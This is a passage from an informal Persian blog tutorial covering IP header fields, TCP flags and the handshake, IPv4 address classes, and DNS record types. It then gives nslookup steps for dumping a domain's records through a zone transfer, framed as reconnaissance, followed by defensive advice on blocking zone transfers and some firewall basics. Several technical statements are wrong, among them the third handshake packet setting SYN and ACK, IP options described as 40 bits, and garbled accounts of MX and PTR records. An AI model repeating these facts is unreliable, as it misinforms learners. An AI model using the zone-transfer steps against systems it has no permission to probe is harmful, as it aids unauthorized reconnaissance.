8 بيتي است و براي مشخص كردن شماره پروتكل لايه بالاتر براي تجزيه بسته بكار ميرود .
9- فيلد Header Checksum :
16 بيتي و براي كشف خطا .
10- فيلد Source Address :
32 بيتي و براي مشخص كردن IP ادرس فرستنده بكار ميرود .
11- فيلد Destination Address :
32 بيتي و براي مشخص كردن IP ادرس گيرنده بكار ميرود .
12- فيلد Options :
حداكثر 40 بيتي واختياري است .
13- فيلد Payload :
داده هاي دريافتي از لايه بالاتر قرار ميگيرند .
لايه انتقال ( TCP ) :
وظيفه اين لايه فراهم كردن خدماتي سازماندهي شده , مطمئن و مبتني بر اصول سيستم عامل , براي برنامه كاربردي لايه بالاتر است , بگونه اي كه ناكارآمدي لايه اينترنت جبران شود .
هر بسته TCP شامل 6 بيت پرچمه كه هر كدووم از اين بيتها مشخص كننده يه نوع بسته TCP هستند. اين بيتها عبارتند از :
1- بيت URG
2- بيت ACK
3- بيت PSH
4- بيت RST
5- بيت SYN
6- بيت FIN
بيت ACK به معني اينه كه داده هاي فيلد Aknowledgment No. معتبره . ما در اين مرحله از اين بيت در تركيب با ساير بيتها استفاده ميكنيم .
بيت SYN اين بيت هم در تركيب با بيت ACK باعث ايجاد يه ارتباط ميشه .
بيت FIN در انتهاي ارتباط و براي قطع ارتباط براي طرف مقابل ارسال ميشه .
بيت RST قطع يك طرفه ارتباط از طرف صادر كننده اين بيته . در حقيقت پاسخ به بسته هاي سرگردانه كه ما در اين مرحله از اوون نتيجه ميگيريم كه پورت مورد آزمايش بسته است .بيت URG به اين معناست كه داده هاي فيلد Urgent Pointer بايد مورد پردازش قرار بگيره . پردازش داده هاي اين فيلد در لايه كاربرد صورت ميگيره و كاري به مبحث فعلي ما نداره .
و بالاخره بيت PSH كه ست كردن اوون باعث ارسال بسته بطور مستقيم به لايه كاربرد ميشه . و در مواقع ضرورى مثل Telnet بكار ميره .
و فيلدهاي مورد استفاده :
Aknowledgment No. :
اين فيلد شماره ترتيب بايتي كه فرستنده منتظرشه رو تعيين ميكنه .
Sequence No. :
شماره ترتيب آخرين بايت بسته جاري رو در خودش قرار ميده .
براي برقراري ارتباط فرستنده يه بسته بدون اطلاعات رو با تنظيم SYN=1 & ACK=0 و عدد تصادفي x رو در فيلد Sequence No. قرار ميده و به اين وسيله به گيرنده اطلاع ميده كه بسته هاي ارسالي بعدي از طرف فرستنده از شماره x+1 به بعده .
در مرحله دوم گيرنده با دريافت بسته اول در صورت تمايل به قطع ارتباط يه بسته خالي شامل RST=1 بسمت فرستنده ارسال ميكنه و ارتباط قطع ميشه . و در صورت تمايل به بر قراري ارتباط بيتهاي SYN=1 & ACK=1 رو ست ميكنه و مقدار فيلد Aknowledgment No. رو x+1 قرار ميده و عدد تصادفي y رو در Sequence No. قرار ميده . و با اينكار به فرستنده اطلاع ميده كه منتظر ارسال بسته هاي بعدي از شماره x+1 به بعده . و خودش هم اطلاعاتش رو با شماره ترتيب y+1 به بعد براي فرستنده ارسال ميكنه .
و بالاخره فرستنده با تنظيم SYN=1 & ACK=1 و مقداردهي Sequence No.=x+1 وAknowledgment No.=y+1 اعلام ميكنه كه آماده ايجاد ارتباطه .
از اين به بعد تا ارسال بسته شامل بيت خاتمه يعني FIN ارتباط برقراره و دو ماشين بسته هاي خودشون رو با مشخصه هاي گفته شده براي همديگه ارسال ميكنن تا اينكه بسته FIN از سوي يكي از ماشينها ارسال بشه . بعد از ارسال اين بسته ماشين ارسال كننده فقط گيرنده بسته هاي طرف مقابله ( در حقيقت ارتباط يه طرفه ميشه ) تا اينكه طرف دوم هم بسته هاش تمووم بشه و بسته شامل بيت FIN رو ارسال كنه . در اين مرحله هست كه ارتباط بكلي قطع ميشه .
قسمت دوم
آدرسها در اينترنت :
در شبكه كنوني اينترنت تمام كامپيوترهاي متصل به اينترنت داراي يك آدرس 32 بيتي هستند . هر چند تا سال 2005 با فراگير شدن IPng يا IPv6 اين آدرسها 128 بيتي خواخند شد . اين آدرسهاي 32 بيتي چگونه سازماندهي ميشوند ؟
براي سهولت نمايش آدرسها را به 4 قسمت 8 بيتي تقسيم ميكنند كه هر قسمت بين صفر تا 255 است .و بصورت x.y.z.w نمايش ميدهند.
پر ارزشترين بايت , كلاس آدرس را مشخص ميكند . كلاس آدرس مشخص كننده نوع شبكه ماست .
IP آدرس در 5 كلاس A,B,C,D,E تعريف شده اند .
آدرسهاي كلاس A :
قالب 32 بيتي كلاس A بصورت زير است :
آدرس كاربر(24 بيت) آدرس شبكه(7بيت)
هر گاه پرارزشترين بيت IP آدرس صفر باشد , آدرس از كلاس A است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 127 شبكه ميباشد و ميتواند حدود 17000000 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس A شبكه هاي ستون فقرات اينترنتي هستند .
آدرسهاي كلاس B :
قالب 32 بيتي كلاس B بصورت زير است :
آدرس كاربر(16 بيت) آدرس شبكه(14بيت) 10
هر گاه پرارزشترين بيتهاي IP آدرس10 باشند , آدرس از كلاس B است . همانگونه كه مشاهده ميكنيد بخش شبكه اين كلاس قادر به ادرس دهي 16382 شبكه ميباشد . كه هر يك ميتواند 65534 كاربر داشته باشد . بنابراين به اين نتيجه ميرسيم كه ادرسهاي كلاس B شبكه هاي عظيم اينترنتي هستند كه تمام اين آدرسها امروز تخصيص داده شده اند .
آدرسهاي كلاس C :
قالب 32 بيتي كلاس C بصورت زير است :
آدرس كاربر(8 بيت) آدرس شبكه(21بيت) 110
در اين كلاس پرارزشترين بيتها 110 هستند . اين كلاس پر كاربردترين كلاس است . در اين كلاس با توجه به آدرس 21 بيتي شبكه , ميتوان حدود 2000000 شبكه تعريف كرد كه هر كدام قادر به سرويس دهي 254 كاربر خواهند بود .
مي توان با توجه به بايت باارزشتر آدرس , كلاس سرور را مشخص كنيد :
1- كلاس A : عدد سمت چپ IP ادرسهاي كلاس A بين 0 تا 127 ميباشد .
2- كلاس B : عدد سمت چپ IP ادرسهاي كلاس B بين 128 تا 191 ميباشد .
3- كلاس C : عدد سمت چپ IP ادرسهاي كلاس C بين 192 تا 223 ميباشد .
آدرسهاي كلاس D :
قالب 32 بيتي كلاس D بصورت زير است :
آدرس كاربر(28 بيت) 1110
در اين كلاس پرارزشترين بيتها 1110هستند . و 28 بيت بعدي براي مقاصد گروهي بكار ميروند .
آدرسهاي كلاس E :
قالب 32 بيتي كلاس E بصورت زير است :
آدرس كاربر(27 بيت) 11110
فعلا اين دسته از آدرسها بدون استفاده اند .
يه سرور DNS دو قسمت داره :
** برنامه DNS :
كه تقاضاي ترجمه نام از كامپيوترهاي ديگه رو قبول ميكنه و پس از پردازش به متقاضي جواب مناسبي ميده .
** بانك اطلاعاتي :
كه داده هاي لازم براي ترجمه را در خودش ذخيره ميكنه .
ما اطلاعاتموونو از اين ركورد بدست مياريم . پس بايد ساختار اوونو بشناسيم .
ساختار اين بانكها در DNS سرورهاي مختلف فرق ميكنه ولي ساختار كلي و عمل اوونها مثل همه . به اين بانك , بانك ركوردهاي منبع ( فايل RR ) هم ميگن . براي افزايش سرعت ترجمه بهتره كه اين فايل بصورت دائم داخل حافظه نهان ( هموون كش ) سرور DNS قرار بگيره . از اوونجا كه تضميني وجود نداره تا IP آدرسِ يه جايي بصورت دائمي يه آدرسِ به خصوصي باشه پس هر ركورد فايل RR يه زمان انقضايي بايد داشته باشه .
ساختار كلي يه ركورد RR به اين صورته :
1- Domain Name
2- Time to live
3- Class
4- Type
5- Value
اينها اطلاعات كلي هستند كه هر ركورد داخل فايل RR داره . ترتيب قرار گرفتن اوونا در سرورهاي مختلف هم متفاوته .
و حالا ببينيم هر كدووم از فيلدهاي RR چي هستن ؟
1- Domain Name :
همينطور كه از اسمش پيداست نام حوزه در اين فيلد نگهداري ميشه . مقدار اين فيلد يكتا نيست چرا كه ممكنه يه كامپيوتر بيش از يه IP آدرس داشته باشه .
2- Time to live :
زمان انقضاي فيلده كه قبلا در موردش توضيح دادم . معمولا در اين فيلد مقدار 86400 ثانيه ( 24 ساعت ) رو قرار ميدن .
3- Class :
براي مشخص كردن ماهيت نام حوزه هست كه در شبكه هاي مختلف فرق ميكنه . در اين فيلد ميتوونه مقادير IN (براي شبكه اينترنت) يا CHAOS و يا HESIOD مربوط به بقيه شبكه ها قرار ميگيره .
از اوونجا كه بحث ما در مورد شبكه اينترنته , در RR هايي كه باهاشوون كار داريم هميشه در فيلد كلاسشوون مقدار IN قرار داره .
4- Type :
نوع ركورد رو مشخص ميكنه .
مهمترين مقاديري كه Type ميتوونه بگيره عبارتند از :
A) SoA ( Start of Authority) :
اطلاعاتي در مورد ناحيه آدرس نمادين , يك شماره سريال , مدير تعريف اسامي و مهلت اعتبار رو مشخص ميكنه . اين ركورد آغاز تمام ركوردهايست كه در يك ناحيه خاص تعريف شدن . براي درك بهتر مطلب مثال زير رو در نظر بگيريد :
Yahoo.com IN SOA Groups.yahoo.com
Root.Yahoo.Groups.com ( 5 ; Serial No.
7200 ; Refresh time ( sec )
3600 ; Retry time ( sec )
151200 ; Expire time ( sec )
86400 ) ; Minimum of time to live ( sec )
توضيح اينكه جملات پس از ; توضيحاتن و جز RR حساب نميشن .
در اين ركورد SOA آغاز تمام ركوردهايست كه در ناحيه Yahoo.com تعريف شده اند . يعني كامپيوترهاي سرور و گيرنده هاي E-mail كه با آدرس ميل ياهو ارسال شده اند و ( ديگر سايتهاي مربوط به ياهو ) در اين حوزه تعريف ميشن .
B ) A ( IP Address) :
معادلي كه در فيلد اول اوومده رو تعيين ميكنه . توضيح اينكه اگر مقدار فيلدي خالي بود , مقدار فيلد سطر قبلي براي اين فيلد هم در نظر گرفته ميشه .
C ) MX ( Mail Exchange ) :
براي ارسال ميلها با آدرسهاي متفاوت به يك آدرس مورد نظر . مثلا فرض كنيد شما دو آدرس پست الكترونيك از دو سرور جدا از هم داشته باشيد و بخواهيد تمام نامه هاي شما به آدرس يكي از آنها ارسال شود بنابراين با استفاده از اين فيلد ميتونيد اين كار رو انجام بديد . مثلا
Hotmail.com 86400 IN MX yahoo.com
باعث ميشه تا تمام نامه هاي ارسالي به آدرس هات ميل شما وارد پست الكترونيكي ياهوي شما شود .
D ) NS ( Name Server ) :
مشخص كننده نام ماشيني است كه قادر است آدرسهاي يك حوزه را تحليل كند . براي درك اين موضوع يه مثال ميزنم :
Microsoft.com 86400 IN NS ns.microsoft.com
Ns.Microsoft.com 86400 IN A x.y.z.w
اين دو ركورد به اين معني اند كه تمام حوزه ها با نامهايي كه به Microsoft.com ختم ميشوند براي مسيريابي و تشخيص IP آدرسشوون بايد در كامپيوتري با IP آدرس x.y.z.w مورد بررسي قرار بگيرند .
E ) CNAME ( Canonical Name ) :
نامهاي مستعار , راحتتر و مشابه براي يك سايت را تعيين ميكنه . مثلا شما بجاي نوشتن www.altavista.com براي سايت آلتاويستا ميتوونيد براحتي فقط www.av.com را تايپ كنيد تا همان سايت آلتاويستا باز شه . اين كار توسط تعريف زير در RR صورت ميگيره :
www.av.com 86400 IN CNAME www.altavista.com
F ) PTR ( Pointer ) :
اين نوع ركورد هم مثل ركورد قبليست فقط بجاي نام حوزه مرجع , IP آدرس اوون قرار ميگيره :
www.av.com IN PTR x.y.z.w
G ) HINFO ( Host Information ) :
اين نوع ركوردها نوع سيستم عامل و كامپيوتر متناظر با اوون نام حوزه را مشخص ميكنه :
www.name.com 86400 IN HINFO SUN UNIX
يعني هاست متناظر با اين سايت داراي سيستم عامل يونيكسه و سخت افزار اوون سازگار با ميني كامپيوترهاي سان هستن .
H ) MINFO ( Mail Information) :
همان نوع قبليه فقط براي مصخص كردن سيستم عامل و نوع كامپيوتر Mail Server مورد نظر بكار ميره .
I ) TXT ( Text ) :
اين نوع ركورد ارزش عملياتي نداره و فقط مشخصاتي از قبيل صاحب شبكه و ... رو تعيين ميكنه .
اينها انواع ركوردهايي بود كه ميتوونه در RR قرار بگيره . حالا ببينيم اين اطلاعات رو از كجا بياريم و چطور ازشوون استفاده كنيم .
براي بدست آوردن بانك اطلاعاتي RR دو راه داريم (مهمه)
تورات سيستم عامل : سيستم عامل هاي Linux و Windows و كلا سيستم هاي مبتني بر Unix و محصولات Microsoft از دستور nslookup استفاده ميكنن ( بقيه سيستم عاملها رو نميدوونم از كدوم دستور استفاده ميكنن , اگه شما ميدونيد لطفا به منم بگين تا ياد بگيرم و اگه خواستين با اسم خودتون تو همين وبلاگ بنويسم ) . البته دستورات Host و Ding هم براي سيستمهاي Unix بكار برده ميشن ولي از نظر من nslookup بهتره . ( هر كسي يه نظري داره ! )
براي استفاده از دستور nslookup , به پنجره Dos در ويندوز يا shell در لينوكس بريد . ( براي اين كار ميتوونيد از كليدهاي Ctrl+Alt+F2 يا هر كليد تابعي ديگه غير از F7 استفاده كنيد تا ترمينال مجازي( Virtual Terminal)براتون باز بشه . در اين پنجره ميتوونيد دستورات Unix رو اجرا كنيد . براي Dos هم كه فكر نكنم كسي مشكل داشته باشه . ) و دستور nslookup رو تايپ كنيد .
حالا شما در محيط nslookup هستيد . اكنون با استفاده از دستور server نام سايت مورد نظر رو تايپ كنيد تا اطلاعات اوون سايت براي استفاده شما آماده بشه . با دستور set type=any شما ميتونيد تمام اطلاعات مربوط به اوون سايت رو درخواست كنيد و با دستور ls -d ( در لينوكس ) ميتوونيد اطلاعات ارسالي از سرور DNS رو ببينيد . كلا بصورت زير عمل كنيد :
$ nslookup
server [نام يا اي پي سرور مورد نظر]
set type = any
ls -d [نام حوزه ]
در Dos هم هموون دستورات بالا قابل اجرا هستند ولي بجاي Ls -d بايد از Dir استفاده كنيد .
2- استفاده ازنرم افزارهايي كه براي همين كار نوشته شده : همونطوري كه گفتم سيستم عامل يونيكس دستورات Host و Ding رو داره كه مشابه nslookup عمل ميكنن . براي ويندوز هم ميتونيد از نرم افزار Ading براي اينكار استفاده كنيد . علاوه بر اين نرم افزارهاي همه منظوره اي هم وجود دارند كه تمام كارهايي رو كه براي شناسايي در اين 4 قسمت گفتم انجام ميدن . نرم افزارهايي مثل :
Sam Spade
iNet Tools
Net Scan Tools
Cyber Kit
علاوه بر تمام نرم افزارها و روشهاي بالا سايتهايي هم هستند كه اين كار رو بصورت رايگان براي شما انجام ميدن . البته مشخص نيست كه اين سايتها تا كي به كارشوون ادامه ميدن چرا كه برخي از اين سايتها به خاطر انجام فعاليتهاي غير مجاز بلوكه ميشن . سايتهايي مثل :
Network tools
Sam spade
Security space
Net tools
Dos help
DSL reports
اما چگونه از نشت اين گونه اطلاعات كه هم مفيدند و هم مضر جلوگيري كنيم ؟(مهمه)
اگه يه يوزر عادي هستيد كه هيچي !!! بايد از يكي خط بگيريد ?كه در مقابل هكرها از شما محافظت كنه !!!
ما اگه مسئول يه شبكه اينترنتي هستيد يا ميتوونيد براي حفاظت شبكه كاري انجام بدين بهتره كارهاي زير رو انجام بدين :
1- اينو مطمئن باشيد كه كمتر كاربري به سيستم عامل و نوع سخت افزار شما توجه داره ( البته هر چه سيستم عامل و سخت افزار شما بهتر باشه , به خاطر سرعت و كيفيت بهتر خط , مشتري بيشتري داريد ولي اوونا به نوع وسائل شما كاري ندارند بلكه بيشتر به امكانات شما توجه ميكنن ) پس چه دليلي داره كه در فيلدهاي متني مثل HINFO يا MINFO يا TXT نوع سخت افزارتوون رو قرار بدين يا نوع سيستم عامل مورد استفادتوون رو ؟ اين اطلاعات بيشتر به درد هكرها ميخوره تا اينكه براي شما تبليغ باشه . اصلا به نظر من بهتره خالي باشن .
2- از انتقال كامل اطلاعات مربوط به يك حوزه ( Zone Transfer ) جلوگيري كنيد . اينم به ياد داشته باشيد كه انتقال كامل اطلاعات مربوط به يك حوزه ( Zone Transfer ) معمولا براي انتقال ركوردها از DNS اوليه به DNS ثانويه براي بروز رساني DNS ثانويه استفاده ميشه و كاربرد ديگه اي براي كسي ( غير هكرها ) نداره .
3- در تكميل نكته دوم , ديوار آتش شبكه رو طوري تنظيم كنيد كه پورت TCP-53 رو مسدود كنه . اين پورت كار انتقال كلي ركوردها رو انجام ميده . چون براي Query هاي DNS از پورت UDP-53 استفاده مشيه بنابراين بستن اين پورت فقط از انتقال كل ركوردها جلوگيري ميكنه و بس .
4- بهتره براي جلوگيري نشت اطلاعات داخلي شبكه از دو تا DNS يكي خارجي و ديگري داخلي استفاده كنيد . با اينكار شما ميتوونيد توسط DNS خارجي حداقل اطلاعات رو در اختيار كاربران خارجي قرار بدين و DNS داخلي هم كل ركوردها و اطلاعات لازم رو براي كاربران داخل شبكه فراهم ميكنه .
سيستمي است بين كاربران يك شبكه محلي و يك شبكه بيروني (مثل اينترنت) كه ضمن نظارت بر بر دسترسي ها , در تمام سطوح ورود و خروج اطلاعات را تحت نظر دارد .
بسته هاي TCP و IP قبل و پس از ورود به شبكه وارد ديوارآتش ميشوند و منتظر مي مانند تا طبق معيارهاي امنيتي خاصي پردازش شوند . حاصل اين پردازش احتمال وقوع سه حالت است :
1- اجازه عبور بسته صادر ميشود (Accept Mode)
2- بسته حذف ميشود (Blocking Mode)
3- بسته حذف ميشود و پيام مناسبي به مبدا ارسال بسته فرستاده ميشود (Response Mode)
همانطور كه همه جا ايست و بازرسي اعصاب خرد كن و وقتگير است ديوار آتش نيز ميتواند بعنوان يك گلوگاه باعث بالا رفتن ترافيك , تاخير, ازدحام و بن بست شود .
از آنجا كه معماري TCP/IP بصورت لايه لايه است (شامل 4 لايه : فيزيكي, شبكه, انتقال و كاربردي ) وهر بسته براي ارسال يا دريافت بايد از هر 4 لايه عبور كند بنابراين بايد براي حفاظت بايد فيلدهاي مربوط شده در هر لايه را مورد بررسي قرار دهيم . بيشترين اهميت در لايه هاي شبكه , انتقال و كاربرد است چون فيلد مربوط به لايه فيزيكي منحصربه فرد نيست و در طول مسير عوض ميشود . پس به يك ديوار آتش | | |
